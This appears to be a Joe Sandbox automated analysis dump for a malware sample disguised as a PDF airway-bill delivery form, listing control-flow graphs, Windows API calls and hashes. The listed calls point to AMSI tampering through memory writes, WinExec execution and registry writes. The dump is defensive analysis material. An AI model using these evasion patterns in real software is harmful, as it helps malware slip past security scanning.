                                                                                          control_flow_graph 10477 2931a8c-2931a9b 10478 2931aa1-2931aa5 10477->10478 10479 2931b6c-2931b6f 10477->10479 10482 2931aa7-2931aae 10478->10482 10483 2931b08-2931b11 10478->10483 10480 2931b75-2931b7f 10479->10480 10481 2931c5c-2931c60 10479->10481 10485 2931b81-2931b8d 10480->10485 10486 2931b3c-2931b49 10480->10486 10489 2931c66-2931c6b 10481->10489 10490 29316e8-293170b call 2931644 VirtualFree 10481->10490 10487 2931ab0-2931abb 10482->10487 10488 2931adc-2931ade 10482->10488 10483->10482 10484 2931b13-2931b27 Sleep 10483->10484 10484->10482 10492 2931b2d-2931b38 Sleep 10484->10492 10494 2931bc4-2931bd2 10485->10494 10495 2931b8f-2931b92 10485->10495 10486->10485 10493 2931b4b-2931b5f Sleep 10486->10493 10496 2931ac4-2931ad9 10487->10496 10497 2931abd-2931ac2 10487->10497 10498 2931af3 10488->10498 10499 2931ae0-2931af1 10488->10499 10505 2931716 10490->10505 10506 293170d-2931714 10490->10506 10492->10483 10493->10485 10504 2931b61-2931b68 Sleep 10493->10504 10502 2931b96-2931b9a 10494->10502 10503 2931bd4-2931bd9 call 29314c0 10494->10503 10495->10502 10500 2931af6-2931b03 10498->10500 10499->10498 10499->10500 10500->10480 10508 2931bdc-2931be9 10502->10508 10509 2931b9c-2931ba2 10502->10509 10503->10502 10504->10486 10510 2931719-2931723 10505->10510 10506->10510 10508->10509 10512 2931beb-2931bf2 call 29314c0 10508->10512 10513 2931bf4-2931bfe 10509->10513 10514 2931ba4-2931bc2 call 2931500 10509->10514 10512->10509 10516 2931c00-2931c28 VirtualFree 10513->10516 10517 2931c2c-2931c59 call 2931560 10513->10517
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?), ref: 02931B17
                                                                                          • Sleep.KERNEL32(0000000A,00000000,?), ref: 02931B31
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: 0`
                                                                                          • API String ID: 3472027048-3339448193
                                                                                          • Opcode ID: 26788b04ec07da1657ad7b4d9e6c0e801537dd16a348be90aac3fbfa58bdb7db
                                                                                          • Instruction ID: bc9a6252f47ff04056dc07cb361e63da942029a31467d18635c5d0ca6bf887ef
                                                                                          • Opcode Fuzzy Hash: 26788b04ec07da1657ad7b4d9e6c0e801537dd16a348be90aac3fbfa58bdb7db
                                                                                          • Instruction Fuzzy Hash: 7251F3716053408FE716CF6CC9847A6BBE4EF85324F1885AEE44DCB2A6E770D845CBA1

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02948715
  • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
  • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02948774
Strings
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: 97df2ccb7e3b147aec2c85de4b6a207f16ac56095c6ab95e2efb235941fa4354
• Instruction ID: 6ab1fce4646095b4c23fcb51a9593c05c2fbba14737d20daecae2f9cc4773504
• Opcode Fuzzy Hash: 97df2ccb7e3b147aec2c85de4b6a207f16ac56095c6ab95e2efb235941fa4354
• Instruction Fuzzy Hash: BEF0A46110C38179E201E6B48C45F4FBFCD4BD2228F448A5CF1E8562D2DA75D1058BB7

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E436
Strings
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 2604ca15854f546ffc7c2fee415236a2107668ab50f5630800ca1305601d0323
• Instruction ID: 5c95d366f804bf2dfe37145986bb999e7a55668934b18bca980e9874cae2165d
• Opcode Fuzzy Hash: 2604ca15854f546ffc7c2fee415236a2107668ab50f5630800ca1305601d0323
• Instruction Fuzzy Hash: AA410E71B501089BEB12EBA4DC41E9EB3FAFFCC724F625425E085A7240DE74AD018F65
APIs
  • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
  • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
  • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
• WinExec.KERNEL32(?,?), ref: 02948478
Strings
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: 4d7343aa0a8e38fbb16ac83f7a9d7e3ae2d6fa551a88d91544d88e300284a97c
• Instruction ID: 96c2901e47a4cd387a86ba0c0c245106b122b3e8ac763190cf1a06c2fb99cfa3
• Opcode Fuzzy Hash: 4d7343aa0a8e38fbb16ac83f7a9d7e3ae2d6fa551a88d91544d88e300284a97c
• Instruction Fuzzy Hash: 63018135644304BFEB11EFB8DC02F6A77EDF788710F928420F508D3680DA74AD008A24
APIs
  • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
  • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
  • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
  • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
• WinExec.KERNEL32(?,?), ref: 02948478
Strings
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: 2928fd46b9e25269f7606a3042ce174e6bd42c0b7a089c0cfd06bedf8b179690
• Instruction ID: f51e90220562ce06d80e6daf24f348b5b883dbd2c0c8dc78516d59436af886b2
• Opcode Fuzzy Hash: 2928fd46b9e25269f7606a3042ce174e6bd42c0b7a089c0cfd06bedf8b179690
• Instruction Fuzzy Hash: CCF08135644304BFEB11EFB8DC02F5A77EDF788710F928420F508D3680DA74A9008A24
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CFC,?,?,02943888,00000001), ref: 02945C10
• GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CFC,?,?,02943888,00000001), ref: 02945C3E
  • Part of subcall function 02937D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02943888,02945C7E,00000000,02945CFC,?,?,02943888), ref: 02937D66
  • Part of subcall function 02937F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02943888,02945C99,00000000,02945CFC,?,?,02943888,00000001), ref: 02937F3F
• GetLastError.KERNEL32(00000000,02945CFC,?,?,02943888,00000001), ref: 02945CA3
  • Part of subcall function 0293A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0293C361,00000000,0293C3BB), ref: 0293A71F
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• API String ID: 503785936-0
• Opcode ID: ee2343e0ee3ed9ff59753f6cd613913ee78835ffe82605b7f723cb2c79dd896c
• Instruction ID: 759fda0ffc6cb806431faac577b3a8f429fa2aa1d5093e2eb56f4fc80838e72f
• Opcode Fuzzy Hash: ee2343e0ee3ed9ff59753f6cd613913ee78835ffe82605b7f723cb2c79dd896c
• Instruction Fuzzy Hash: 8C318375E042089FEB01EFA4C880BAEB7F6AF88714F918465E904E7380DB755A05CFA5
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02A85914), ref: 0294E704
• RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E73C
• RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E747
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: 273d7ec34af3bd57c3c0ed94b78d38fb3bbf3b2b060a7fbafbbb9a363f9a68f6
• Instruction ID: 3754e7a51ba33c1ad71b2bf2cd6d6ca27b09ee74668a5e48b0147210ab46277a
• Opcode Fuzzy Hash: 273d7ec34af3bd57c3c0ed94b78d38fb3bbf3b2b060a7fbafbbb9a363f9a68f6
• Instruction Fuzzy Hash: 04110A71A50204BFEB01EBA8DC81D6A7BEDEB89720F924470B944D7250DA34EE41CE65
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02A85914), ref: 0294E704
• RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E73C
• RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,0294E76F), ref: 0294E747
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: 82687791306bd17fd136ff1a03ba8db0f2e89d0209d88527df07b9be64085555
• Instruction ID: 15823b069392a3abd8d8438b7fce8763a3a9568411271eb5ed5fac1ad5f6365c
• Opcode Fuzzy Hash: 82687791306bd17fd136ff1a03ba8db0f2e89d0209d88527df07b9be64085555
• Instruction Fuzzy Hash: A6110A71A50204AFEB01EBA8DC81D6A7BEDEB89720F924470B944D7250DA34EA41CE65
APIs
Memory Dump Source
• Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
• Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: a791192206e26a12b107f7f6526f0e82e6af334af5aa42b93d7c54e3db2b97b7
• Instruction ID: 781a6c5647ca3ba5f7e88466c1cbd4048b261bfbad989fa77cc46462abc8d2b5
• Opcode Fuzzy Hash: a791192206e26a12b107f7f6526f0e82e6af334af5aa42b93d7c54e3db2b97b7
• Instruction Fuzzy Hash: F5F0962470421086D7277B39D9C4A7D279EAFC5710B505836F4C6AB245CB34EC45CB63
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02934D07
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02934D19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Free$Alloc
                                                                                          • String ID:
                                                                                          • API String ID: 986138563-0
                                                                                          • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                          • Instruction ID: a9a1a68a9aad51483da87d1bfcb91dae3877a6cd53fb48b50f3c20ac24f32db8
                                                                                          • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                          • Instruction Fuzzy Hash: 4AE017B82052016EFF1B2F219C40B7B372EBFC2741B259899E804CA160DB78C841AE34
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(?), ref: 02947362
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID: H
                                                                                          • API String ID: 3341692771-2852464175
                                                                                          • Opcode ID: b5aab33786c1be42d0a1b9c2b5bce3744d729d95a8fdaab34869a4d242b755a9
                                                                                          • Instruction ID: cb8f6cdd66459033a68602365a20534bc252995cfc1b663ad900243a3dbcb0da
                                                                                          • Opcode Fuzzy Hash: b5aab33786c1be42d0a1b9c2b5bce3744d729d95a8fdaab34869a4d242b755a9
                                                                                          • Instruction Fuzzy Hash: D5B1F074A016089FDB15CF99E880AADFBF6FF89314F258569E805AB360DB30A845CF50
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                            • Part of subcall function 02947D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          • FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3283153180-0
                                                                                          • Opcode ID: 14d2218aa810634ae143663c53431f3cc9caa13561a46ad73c7a571a4283e747
                                                                                          • Instruction ID: e6edecd4ae6e34074b6351a199a05ffefb088af0b66668b0624d4ac9f4ad5027
                                                                                          • Opcode Fuzzy Hash: 14d2218aa810634ae143663c53431f3cc9caa13561a46ad73c7a571a4283e747
                                                                                          • Instruction Fuzzy Hash: 1C114F70A40305ABFF02FBA8DC02E6E77B9FBC5720F5105A5B108A7A80DE34AD009B54
                                                                                          APIs
                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 0293E709
                                                                                            • Part of subcall function 0293E2EC: VariantClear.OLEAUT32(?), ref: 0293E2FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy
                                                                                          • String ID:
                                                                                          • API String ID: 274517740-0
                                                                                          • Opcode ID: a88c10efcd1cb811fe0cf5c8d2898241b2996628eab15d01995c7005d3b3c775
                                                                                          • Instruction ID: ee73fe86e2ec452c56e757098fe35e7c0d3126d2077b00a4da48c72bb30dc613
                                                                                          • Opcode Fuzzy Hash: a88c10efcd1cb811fe0cf5c8d2898241b2996628eab15d01995c7005d3b3c775
                                                                                          • Instruction Fuzzy Hash: E311A12171431487CB23AF29CDC5A6B77DAEFC57507059826BACBCB255DB30CC41CAA2
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02931A03,?,02932000), ref: 029315E2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID: 0`
                                                                                          • API String ID: 4275171209-3339448193
                                                                                          • Opcode ID: ecf779bd698f2703e799b4b36a48a6d74feb2434444006938538301db86167c3
                                                                                          • Instruction ID: e85eafc04d2fd3e40374937f0f94d21612fd1e6499fcd2a4b71cc1821d109797
                                                                                          • Opcode Fuzzy Hash: ecf779bd698f2703e799b4b36a48a6d74feb2434444006938538301db86167c3
                                                                                          • Instruction Fuzzy Hash: F0F049F0B453005FEB06DF799D643217AD6E789348F188579E749DB398E77198018B00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1927566239-0
                                                                                          • Opcode ID: 30dcea4dc4f714d78a742e8f214277ca7ec8135a58e6d79ccbedbeca11bfa87d
